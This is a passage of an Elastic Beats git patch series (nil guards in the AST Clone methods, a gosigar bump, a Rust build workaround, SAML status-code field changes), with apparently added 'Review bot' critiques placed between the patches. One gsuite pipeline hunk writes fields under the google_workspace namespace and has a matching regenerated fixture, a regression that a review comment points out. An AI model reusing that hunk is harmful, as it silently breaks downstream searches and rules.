index cfb02d1660ac..1ae1066c8c6e 100644
--- a/x-pack/elastic-agent/pkg/agent/transpiler/ast.go
+++ b/x-pack/elastic-agent/pkg/agent/transpiler/ast.go
@@ -126,7 +126,11 @@ func (d *Dict) Value() interface{} {
 func (d *Dict) Clone() Node {
 nodes := make([]Node, 0, len(d.value))
 for _, i := range d.value {
+ if i == nil {
+ continue
+ }
 nodes = append(nodes, i.Clone())
+
 }
 return &Dict{value: nodes}
 }
@@ -350,6 +354,9 @@ func (l *List) Value() interface{} {
 func (l *List) Clone() Node {
 nodes := make([]Node, 0, len(l.value))
 for _, i := range l.value {
+ if i == nil {
+ continue
+ }
 nodes = append(nodes, i.Clone())
 }
 return &List{value: nodes}
From a1559f42b3609e66e431a6df49df8165c5c0a78a Mon Sep 17 00:00:00 2001
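Review bot: The nil guards added to Dict.Clone and List.Clone silently drop null entries, so a clone no longer has the same item count as its source and the nil is neither surfaced nor rejected; if ignoring a YAML `null` item is the intended contract, say so at the guard, e.g. `// a YAML null item parses to a nil Node; skip it instead of dereferencing it`. The guard only covers Clone, and the hunk headers show other traversals of the same slices exist (Value() on both types), which presumably still dereference a nil item — filtering nils once where the AST is built would establish the invariant for every consumer rather than patching one method at a time. The first hunk also adds a stray blank line between `nodes = append(nodes, i.Clone())` and the loop's closing brace that should be removed. The single_config.yml fixture only exercises the List case (`processors: - null`); nothing in the added testdata drives a Dict holding a nil value through Clone. Both Clone bodies are complete within these hunks.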
From: Mariana Dima Date: Fri, 26 Mar 2021 11:48:52 +0000 Subject: [PATCH 15/20] Cherry-pick #24502 to 7.12: Update gosigar package after fix (#24627) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Update gosigar package after fix (#24502) * mofidy doc * work on fix * update changelog * update notice * Update notice * [Ingest Manager] Sync on rename on windows (#24504) * Add tests for encoding settings of filestream input (#24426) * [Elastic Agent] Add the ability to provide custom CA's inside of docker. (#24486) * Add the ability to provide custom CA's for Elastic Agent docker. * Add changelog. * Update Golang to 1.15.9 (#24442) * Add syntax for multiple selector logging (#24207) (#24497) * Add syntax for multiple selector logging * Update libbeat/docs/loggingconfig.asciidoc Co-authored-by: EamonnTP Co-authored-by: EamonnTP Co-authored-by: AndyHunt66 * chore(ci): use beat_version instead of PR version (#24446) * Add test for close.reader.after_interval to filestream input (#24423) * Refactor use of system.hostfs to fix cgroup metrics (#24334) * refactor use of system.hostfs to fix cgroup metrics * add changelog * remove comment * add cfgwarn * move changelog * shift around CLI config location and rep warning * add comment about system.hostfs usage * update docs * capitalization * fix grammar, add conditional * change docs phrasing * [Elastic Agent] Add verification check when updating communication to Kibana. (#24489) * Add verification check when updating communication to Kibana. * Add changelog. * Add const. * Fix typo in mqtt input docs (#24509) * Update input-http-endpoint.asciidoc (#24490) * [Ingest Manager] Move logging defaults to agent (#24535) [Ingest Manager] Move logging defaults to agent (#24535) * Clarify that the Tomcat module is for ingesting access logs (#24543) The Tomcat module is for ingesting access logs, not Catalina or localhost logs. 
* [Auditbeat] btmp offset check (#24515) * auditbeat btmp offset check Add check that saved offset is not larger than the current file size to prevent seeking past the end of file * [Heartbeat] Produce error rather than panic on missing source (#24404) Fixes #24403. With the changes to the heartbeat config syntax in 7.12 the `source` field is now required. Our config validation code didn't actually check for this field's presence, which caused an NPE. This PR adds a validation checking for that config's presence. It also adds tests for the validation code for config sub-fields. There were no defects found in the validations for source.inline, or source.browser, but a few tests were missing. Instead of the panic seen in #24403 users will now get the error seen below. ``` 2021-03-05T15:41:40.146-0600 ERROR instance/beat.go:952 Exiting: could not create monitor: job err could not parse suite config: config 'source' must be specified for this monitor, if upgrading from a previous experimental version please see our new config docs accessing 'heartbeat.monitors.0' (source:'sample-synthetics-config/heartbeat.yml') Exiting: could not create monitor: job err could not parse suite config: config 'source' must be specified for this monitor, if upgrading from a previous experimental version please see our new config docs accessing 'heartbeat.monitors.0' (source:'sample-synthetics-config/heartbeat.yml') ``` * Fix default scope in add_nomad_metadata (#24559) Fix default scope in add_nomad_metadata. It is set to local, but it should be node. Fix also error message that showed that local is a valid value. 
* [Filebeat] Add Dashboards to Threat Intel Module (#24488) * added dashboards & docs * ran mage fmt update * [CI] bump gvm version and use the binary (#24571) * [CI] Add resilience when installing required tooling (#24542) * [CI] enable new flaky detector (#24464) * chore: do not pass beat version (#24586) We will be delegating the version calculation to the e2e tests, using target branch values as defaults Co-authored-by: Jaime Soriano Pastor Co-authored-by: Michal Pristas Co-authored-by: Noémi Ványi Co-authored-by: Blake Rouse Co-authored-by: EamonnTP Co-authored-by: AndyHunt66 Co-authored-by: Manuel de la Peña Co-authored-by: Alex K <8418476+fearful-symmetry@users.noreply.github.com> Co-authored-by: DeDe Morton Co-authored-by: Lee Hinman <57081003+leehinman@users.noreply.github.com> Co-authored-by: Andrew Cholakian Co-authored-by: Andrew Pease <7442091+peasead@users.noreply.github.com> Co-authored-by: Victor Martinez (cherry picked from commit 5c6f1b637745845f04ecdee79d9ecf9f3d18054d) * upadte changelog --- CHANGELOG.next.asciidoc | 1 + NOTICE.txt | 4 ++-- go.mod | 2 +- go.sum | 4 ++-- 4 files changed, 6 insertions(+), 5 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 9574394aea85..db71b9b8d66c 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -264,6 +264,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix remote_write flaky test. {pull}21173[21173] - Remove io.time from windows {pull}22237[22237] - Fix `logstash` module when `xpack.enabled: true` is set from emitting redundant events. {pull}22808[22808] +- Ignore unsupported derive types for filesystem metricset. {issue}22501[22501] {pull}24502[24502] *Packetbeat* diff --git a/NOTICE.txt b/NOTICE.txt index dcae67f62f1d..ed4f2cb34231 100644 --- a/NOTICE.txt +++ b/NOTICE.txt 
@@ -8299,11 +8299,11 @@ Contents of probable licence file $GOMODCACHE/github.com/elastic/go-ucfg@v0.8.3/ -------------------------------------------------------------------------------- Dependency : github.com/elastic/gosigar -Version: v0.14.0 +Version: v0.14.1 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/gosigar@v0.14.0/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/elastic/gosigar@v0.14.1/LICENSE: Apache License Version 2.0, January 2004 diff --git a/go.mod b/go.mod index 6575cc2ab04f..e8855bce0fcb 100644 --- a/go.mod +++ b/go.mod @@ -73,7 +73,7 @@ require ( github.com/elastic/go-txfile v0.0.7 github.com/elastic/go-ucfg v0.8.3 github.com/elastic/go-windows v1.0.1 // indirect - github.com/elastic/gosigar v0.14.0 + github.com/elastic/gosigar v0.14.1 github.com/fatih/color v1.9.0 github.com/fsnotify/fsevents v0.1.1 github.com/fsnotify/fsnotify v1.4.9 diff --git a/go.sum b/go.sum index 91689b3a18a2..7eef9ed3806c 100644 --- a/go.sum +++ b/go.sum 
@@ -278,8 +278,8 @@ github.com/elastic/go-ucfg v0.8.3/go.mod h1:iaiY0NBIYeasNgycLyTvhJftQlQEUO2hpF+F github.com/elastic/go-windows v1.0.0/go.mod h1:TsU0Nrp7/y3+VwE82FoZF8gC/XFg/Elz6CcloAxnPgU= github.com/elastic/go-windows v1.0.1 h1:AlYZOldA+UJ0/2nBuqWdo90GFCgG9xuyw9SYzGUtJm0= github.com/elastic/go-windows v1.0.1/go.mod h1:FoVvqWSun28vaDQPbj2Elfc0JahhPB7WQEGa3c814Ss= -github.com/elastic/gosigar v0.14.0 h1:5w470Q8AagzVY8U48ab8rVkQrOXiIK1NHBYWrAxi9kI= -github.com/elastic/gosigar v0.14.0/go.mod h1:iXRIGg2tLnu7LBdpqzyQfGDEidKCfWcCMS0WKyPWoMs= +github.com/elastic/gosigar v0.14.1 h1:T0aQ7n/n2ZA9W7DmAnj60v+qzqKERdBgJBO1CG2W6rc= +github.com/elastic/gosigar v0.14.1/go.mod h1:iXRIGg2tLnu7LBdpqzyQfGDEidKCfWcCMS0WKyPWoMs= github.com/elastic/sarama v1.19.1-0.20210120173147-5c8cb347d877 h1:C9LsbipColsz04JKpKoLlp0pgMJRLq2uXVTeKRDcNcY= github.com/elastic/sarama v1.19.1-0.20210120173147-5c8cb347d877/go.mod h1:g5s5osgELxgM+Md9Qni9rzo7Rbt+vvFQI4bt/Mc93II= github.com/elazarl/goproxy v0.0.0-20180725130230-947c36da3153 h1:yUdfgN0XgIJw7foRItutHYUIhlcKzcSf5vDpdhQAKTc= From 50382d6e0c6a87834204a69a27491c44e029fff3 Mon Sep 17 00:00:00 2001 From: Steffen Siering Date: Fri, 26 Mar 2021 23:35:03 +0100 Subject: [PATCH 16/20] Cherry-pick #24775 to 7.12: Disable rust when preparing the python environment (#24793) When setting up the python environment or upgrading pip the build might fail because rust is not available or recent enough. We set the `CRYPTOGRAPHY_DONT_BUILD_RUST=1` environment variable as mitigation whenever we prepare the python test environment. (cherry picked from commit eb937f076e87b4dd6984c999fd1076193e37ed38) --- dev-tools/common.bash | 4 ++++ dev-tools/mage/pytest.go | 6 ++++++ libbeat/scripts/Makefile | 1 + 3 files changed, 11 insertions(+) diff --git a/dev-tools/common.bash b/dev-tools/common.bash index 72940c0591ec..9439e15e93dc 100644 --- a/dev-tools/common.bash +++ b/dev-tools/common.bash 
@@ -91,6 +91,10 @@ jenkins_setup() { # Workaround for Python virtualenv path being too long. export TEMP_PYTHON_ENV=$(mktemp -d) + + # Workaround for cryptography package (pip dependency) relying on rust + export CRYPTOGRAPHY_DONT_BUILD_RUST=1 + export PYTHON_ENV="${TEMP_PYTHON_ENV}/python-env" # Write cached magefile binaries to workspace to ensure diff --git a/dev-tools/mage/pytest.go b/dev-tools/mage/pytest.go index e562fdef95bb..f933300f935b 100644 --- a/dev-tools/mage/pytest.go +++ b/dev-tools/mage/pytest.go @@ -192,6 +192,12 @@ func PythonVirtualenv() (string, error) { pythonVirtualenvLock.Lock() defer pythonVirtualenvLock.Unlock() + // When upgrading pip we might run into an error with the cryptography package + // (pip dependency) will not compile if no recent rust development environment is available. + // We set `CRYPTOGRAPHY_DONT_BUILD_RUST=1`, to disable the need for python. + // See: https://github.com/pyca/cryptography/issues/5771 + os.Setenv("CRYPTOGRAPHY_DONT_BUILD_RUST", "1") + // Determine the location of the virtualenv. ve, err := pythonVirtualenvPath() if err != nil { diff --git a/libbeat/scripts/Makefile b/libbeat/scripts/Makefile index 4fd87f32d75b..e6d913ab1f47 100755 --- a/libbeat/scripts/Makefile +++ b/libbeat/scripts/Makefile @@ -267,6 +267,7 @@ load-tests: ## @testing Runs load tests # Sets up the virtual python environment .PHONY: python-env +python-env: export CRYPTOGRAPHY_DONT_BUILD_RUST=1 python-env: ${ES_BEATS}/libbeat/tests/system/requirements.txt @test -e ${PYTHON_ENV}/bin/activate || ${PYTHON_EXE} -m venv ${VENV_PARAMS} ${PYTHON_ENV} @. ${PYTHON_ENV}/bin/activate && pip install ${PIP_INSTALL_PARAMS} -q --upgrade pip ; \ From 4e87326d183e6471e11b3f25164fbfbd1938573e Mon Sep 17 00:00:00 2001 
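Review bot: The comment above the new `os.Setenv` call in PythonVirtualenv says the variable disables "the need for python", but the variable being set is CRYPTOGRAPHY_DONT_BUILD_RUST, so the line should read `// We set CRYPTOGRAPHY_DONT_BUILD_RUST=1 to remove the need for a Rust toolchain.` The call also discards `os.Setenv`'s error and overwrites any value the user already exported, and because it mutates process-global state it stays in effect for everything mage runs afterwards, not only the virtualenv setup; the Makefile hunk in this commit scopes the same variable to the python-env target, which is the tighter pattern, and `if os.Getenv("CRYPTOGRAPHY_DONT_BUILD_RUST") == "" {` around the call would at least keep a deliberate override. As far as I know upstream cryptography offered this opt-out only for a few releases before dropping it, so it is worth a comment marking the workaround as temporary and tying it to the pinned package version. The body of PythonVirtualenv continues outside the hunk.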
From: Marc Guasch Date: Mon, 29 Mar 2021 14:40:34 +0200 Subject: [PATCH 17/20] Fix saml status code parsing (#24785) (#24808) (cherry picked from commit 18b5f9214a32e33c693dba852a3f97d646907838) --- filebeat/docs/fields.asciidoc | 8 +++--- .../module/google_workspace/fields.go | 2 +- .../google_workspace/saml/_meta/fields.yml | 4 +-- .../google_workspace/saml/config/pipeline.js | 9 +------ .../saml/test/saml-test.json.log | 4 +-- .../test/saml-test.json.log-expected.json | 12 ++++----- x-pack/filebeat/module/gsuite/fields.go | 2 +- .../module/gsuite/saml/_meta/fields.yml | 4 +-- .../module/gsuite/saml/config/pipeline.js | 9 +------ .../saml/test/gsuite-saml-test.json.log | 4 +-- .../gsuite-saml-test.json.log-expected.json | 26 +++++++++---------- 11 files changed, 35 insertions(+), 49 deletions(-) diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index c41cc67fb652..0e95952e6b09 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -66106,7 +66106,7 @@ type: keyword SAML status code. -type: long +type: keyword -- @@ -66116,7 +66116,7 @@ type: long SAML second level status code. -type: long +type: keyword -- @@ -67370,7 +67370,7 @@ type: keyword SAML status code. -type: long +type: keyword -- @@ -67380,7 +67380,7 @@ type: long SAML second level status code. -type: long +type: keyword -- diff --git a/x-pack/filebeat/module/google_workspace/fields.go b/x-pack/filebeat/module/google_workspace/fields.go index a17ca4dd5a47..8ce7b296cf7d 100644 --- a/x-pack/filebeat/module/google_workspace/fields.go +++ b/x-pack/filebeat/module/google_workspace/fields.go @@ -19,5 +19,5 @@ func init() { // AssetGoogleWorkspace returns asset data. // This is the base64 encoded gzipped contents of module/google_workspace. func AssetGoogleWorkspace() string { - return "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" + return "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" } 
diff --git a/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml b/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml index b7e9efc09266..fc0adfcb55c2 100644 --- a/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml +++ b/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml @@ -18,10 +18,10 @@ description: > User orgunit. - name: status_code - type: long + type: keyword description: > SAML status code. - name: second_level_status_code - type: long + type: keyword description: > SAML second level status code. diff --git a/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js b/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js index 9a779f8dd884..705db7f2f1e7 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js @@ -32,14 +32,7 @@ var saml = (function () { // all saml event parameters are strings. // for this reason we know for sure they are in the 'value' field. // https://developers.google.com/admin-sdk/reports/v1/appendix/activity/saml - switch (p.name) { - case "status_code": - case "second_level_status_code": - evt.Put("google_workspace.saml."+p.name, parseInt(p.value)); - break; - default: - evt.Put("google_workspace.saml."+p.name, p.value); - } + evt.Put("google_workspace.saml."+p.name, p.value); }); evt.Delete("json.events.parameters"); diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log index 678193e25d5f..ed672b58a568 100644 --- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log +++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log 
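Review bot: Changing `status_code` and `second_level_status_code` from `long` to `keyword` is a mapping change on a shipped module, and the diffstat for this patch carries no CHANGELOG.next.asciidoc entry. Indices created under the old template keep the long mapping, so once the new template applies, an index pattern that spans both will report a field type conflict for google_workspace.saml.status_code and any saved search or rule comparing the field numerically stops matching. The change itself is right, since the upstream values are URIs such as SUCCESS_URI, as the regenerated fixtures show; what is missing is a breaking-change note naming both fields, and the same applies to the gsuite fields.yml hunk later in this patch.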
@@ -1,2 +1,2 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"400"},{"name":"saml_status_code","value":"400"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"400"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json index 90f6463ce340..d6f84e5c64fc 100644 --- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json 
@@ -9,7 +9,7 @@ "event.dataset": "google_workspace.saml", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"400\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "failure", "event.provider": "saml", "event.type": [ 
@@ -24,8 +24,8 @@ "google_workspace.saml.failure_type": "failure_app_not_configured_for_user", "google_workspace.saml.initiated_by": "idp", "google_workspace.saml.orgunit_path": "ounit", - "google_workspace.saml.second_level_status_code": 400, - "google_workspace.saml.status_code": 400, + "google_workspace.saml.second_level_status_code": "SUCCESS_URI", + "google_workspace.saml.status_code": "SUCCESS_URI", "input.type": "log", "log.offset": 0, "organization.id": "1", @@ -68,7 +68,7 @@ "event.dataset": "google_workspace.saml", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "success", "event.provider": "saml", "event.type": [ 
@@ -82,9 +82,9 @@ "google_workspace.saml.application_name": "app", "google_workspace.saml.initiated_by": "idp", "google_workspace.saml.orgunit_path": "ounit", - "google_workspace.saml.status_code": 400, + "google_workspace.saml.status_code": "SUCCESS_URI", "input.type": "log", - "log.offset": 606, + "log.offset": 622, "organization.id": "1", "related.ip": [ "98.235.162.24" diff --git a/x-pack/filebeat/module/gsuite/fields.go b/x-pack/filebeat/module/gsuite/fields.go index 1d4d320cd3bb..b25ae2dec1f2 100644 --- a/x-pack/filebeat/module/gsuite/fields.go +++ b/x-pack/filebeat/module/gsuite/fields.go @@ -19,5 +19,5 @@ func init() { // AssetGsuite returns asset data. // This is the base64 encoded gzipped contents of module/gsuite. func AssetGsuite() string { - return "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" + return "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" } diff --git a/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml b/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml index b7e9efc09266..fc0adfcb55c2 100644 --- a/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml +++ b/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml @@ -18,10 +18,10 @@ description: > User orgunit. - name: status_code - type: long + type: keyword description: > SAML status code. - name: second_level_status_code - type: long + type: keyword description: > SAML second level status code. diff --git a/x-pack/filebeat/module/gsuite/saml/config/pipeline.js b/x-pack/filebeat/module/gsuite/saml/config/pipeline.js index 2011e6d437b2..705db7f2f1e7 100644 --- a/x-pack/filebeat/module/gsuite/saml/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/saml/config/pipeline.js 
@@ -32,14 +32,7 @@ var saml = (function () { // all saml event parameters are strings. // for this reason we know for sure they are in the 'value' field. // https://developers.google.com/admin-sdk/reports/v1/appendix/activity/saml - switch (p.name) { - case "status_code": - case "second_level_status_code": - evt.Put("gsuite.saml."+p.name, parseInt(p.value)); - break; - default: - evt.Put("gsuite.saml."+p.name, p.value); - } + evt.Put("google_workspace.saml."+p.name, p.value); }); evt.Delete("json.events.parameters"); diff --git a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log index 678193e25d5f..ed672b58a568 100644 --- a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log +++ b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log 
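Review bot: The replacement line writes to `google_workspace.saml.` but this is the gsuite module's pipeline, so the gsuite fileset now emits its SAML parameters under another module's namespace while the rest of the event (gsuite.actor.type, gsuite.kind and so on) stays under gsuite; the new blob id 705db7f2f1e7 is the same as the google_workspace pipeline.js, which suggests the file was copied over rather than edited. The regenerated expected-output fixture for gsuite matches the regression, so the test suite passes while gsuite.saml.status_code and gsuite.saml.failure_type disappear from events, which silently breaks any saved search or detection rule keyed on them and leaves the fields declared in gsuite/saml/_meta/fields.yml unpopulated. The line should be `evt.Put("gsuite.saml."+p.name, p.value);` with the gsuite expected JSON reverted to the gsuite.saml.* keys. The enclosing forEach callback and the saml IIFE start outside the hunk.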
@@ -1,2 +1,2 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"400"},{"name":"saml_status_code","value":"400"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"400"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} diff --git a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json index 850766be83d3..7763ca178817 100644 --- a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json 
@@ -8,23 +8,23 @@ "event.dataset": "gsuite.saml", "event.id": "1", "event.module": "gsuite", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"400\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "failure", "event.provider": "saml", "event.type": [ "start" ], "fileset.name": "saml", + "google_workspace.saml.application_name": "app", + "google_workspace.saml.failure_type": "failure_app_not_configured_for_user", + "google_workspace.saml.initiated_by": "idp", + "google_workspace.saml.orgunit_path": "ounit", + "google_workspace.saml.second_level_status_code": "SUCCESS_URI", + 
